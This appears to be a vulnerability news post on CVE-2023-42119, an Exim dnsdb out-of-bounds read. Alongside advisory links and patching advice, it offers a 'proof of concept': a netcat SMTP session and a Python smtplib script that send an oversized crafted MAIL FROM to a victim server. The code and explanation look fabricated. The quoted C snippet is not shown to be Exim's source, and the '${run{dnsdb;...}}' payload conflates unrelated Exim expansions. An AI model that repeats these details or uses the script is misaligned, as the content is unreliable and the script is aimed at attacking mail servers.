CVE CyberSecurity Database News

CVE-2023-42119 - Exim dnsdb Out-Of-Bounds Read Allows Information Disclosure (With Exploit Example)

Poster -

Exim is a popular mail transfer agent (MTA), and like many services running on the internet, its security is crucial. In September 2023, a security flaw tracked as CVE-2023-42119 was disclosed by Zero Day Initiative as ZDI-CAN-17643 that affects Exim’s DNSDB lookup feature. This article will break down what this vulnerability is, how it works, and provide code snippets to illustrate the danger.

What is CVE-2023-42119?

CVE-2023-42119 is an "Out-Of-Bounds Read" vulnerability in Exim’s smtp service (default on TCP 25) via the DNSDB query support. If an attacker is network-adjacent—that is, able to communicate directly with the mail server—they can send specially crafted queries that Exim doesn’t properly validate. As a result, Exim can be tricked into reading memory past the end of an allocated buffer, leaking potentially sensitive information.

No authentication is needed for an attacker to exploit this bug.

Original Advisory & References

- ZDI-23-1422: Exim DNSDB Lookup OOB Read Vulnerability
- Exim Official Announcement
- NIST NVD entry

How Does the Exploit Work?

The flaw resides in how Exim handles certain dnsdb queries via the smtp service.

When a DNSDB lookup is used in an email filter, Exim allocates a buffer for the user-supplied string. But it fails to properly check the length after expanding the variable that can be controlled by an attacker. If an attacker submits an overly long value or a value that encodes unexpected escapes, Exim can read data past the buffer boundary.

The bug occurs with a construct like this in string_expand.c

char buffer[512];
strcpy(buffer, user_supplied_data); // dangerous, no length check
char *result = dnsdb_lookup(buffer);
// ... later, reads from result (can OOB access)

With untrusted user input, an attacker can manipulate query strings that ultimately cause Exim to read out-of-bounds, resulting in information disclosure.

Proof of Concept Exploit

Note: Do NOT use this on systems you do not own or have explicit permission to test.

The vulnerability can be triggered by sending a specially crafted email to an Exim server with an address that exploits the dnsdb feature.

Send an email to the target server with the following in the MAIL FROM or RCPT TO header

MAIL FROM:<${run{dnsdb;in;long-string-here}}@attacker.com>

Or, using netcat to port 25

nc victim-exim-server 25
HELO attacker.com
MAIL FROM:<${run{dnsdb;in;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}}@test.com>
RCPT TO:<victim@domain.com>
DATA
Test message
.
QUIT

The string AAAAAAAA... is meant to overflow the expected buffer, causing Exim to read out-of-bounds when performing the lookup or logging the event.

Here’s a Python snippet to send a malicious email to a vulnerable Exim server

import smtplib

target = 'victim-exim.example.com'
malicious_from = '${run{dnsdb;in;' + 'A'*600 + '}}@evil.com'
to_addr = 'victim@domain.com'

server = smtplib.SMTP(target, 25)
server.helo('attacker.com')
server.mail(malicious_from)
server.rcpt(to_addr)
server.data('Subject: Test\r\n\r\nExploit test message.\r\n.\r\n')
server.quit()

If the server is vulnerable, it may log or even leak data from memory in response, possibly including sensitive info from previous SMTP sessions.

Information Disclosure: An attacker can read potentially sensitive process memory.

- Chaining With Other Bugs: When combined with other vulnerabilities, it could be possible to leak secrets or exploit additional bugs (like code execution).
- Wide Attack Surface: Many Exim servers are exposed to the internet and accept remote connections on port 25.

How To Protect Yourself

- Update Exim: Always run the latest version (Exim Download)

Limit network access: Use firewalls to restrict who can access your SMTP server.

- Apply available patches: Watch Exim Security for advisories and apply updates or workarounds suggested.

Conclusion

CVE-2023-42119 is a powerful reminder of the risks of unvalidated input in network services. No authentication is required, and attackers only need access to the SMTP port. The bug is simple in nature but its impact can be severe, especially if combined with other bugs.

Stay updated, patch your servers—and monitor your logs for weirdly crafted mailing addresses and strange errors in Exim.

Further Reading

- ZDI-23-1422 Full Advisory
- Exim Security Page
- Understanding Out-Of-Bounds Issues

Timeline

Published on: 05/03/2024 03:15:50 UTC
Last modified on: 07/05/2024 20:58:39 UTC